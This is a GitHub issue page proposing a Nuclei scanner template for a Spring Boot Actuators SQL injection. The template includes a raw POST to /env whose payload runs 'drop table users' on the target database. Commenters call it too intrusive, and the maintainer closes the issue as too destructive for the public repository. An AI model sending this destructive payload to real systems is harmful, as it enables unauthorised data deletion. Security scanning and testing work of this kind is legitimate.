nuclei-templates icon indicating copy to clipboard operation
nuclei-templates copied to clipboard

Published 20 hours ago verified publisher icon projectdiscovery

Spring Boot Actuators - SQLi

Open akincibor opened this issue 2 years ago • 2 comments 

id: spring-boot-actuators-sqli

info:
  name: Spring Boot Actuators - SQLi
  author: Akincibor
  severity: high
  description: A misconfiguration allows you to specify any SQL query, and it will be automatically executed against the current database. It could be any statement, including insert, update, or delete.
  reference:
    - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
  tags: sqli

requests:
  - raw:
      - |
        POST /env HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Lenqth:57

        spring.datasource.tomcat.validationQuery=drop+table+users

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"spring.datasource.tomcat.validationQuery":"drop table users"}'

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200

akincibor avatar May 09 '22 14:05 akincibor

drop table users seems to be a super intrusive query

marcelo321 avatar Jul 06 '22 22:07 marcelo321

Is it possible to insert SLEEP and check the response time?

Leetcore avatar Jul 21 '22 20:07 Leetcore

Hi @akincibor, The response time to this issue was much longer than usual. Thank you for taking the time to create this issue and for contributing to this project 🍻

I am closing this because the template is so intrusive that it is not suitable for public repo. You are welcome to create another issue if you think we can update the template to be less destructive.

princechaddha avatar Oct 14 '22 11:10 princechaddha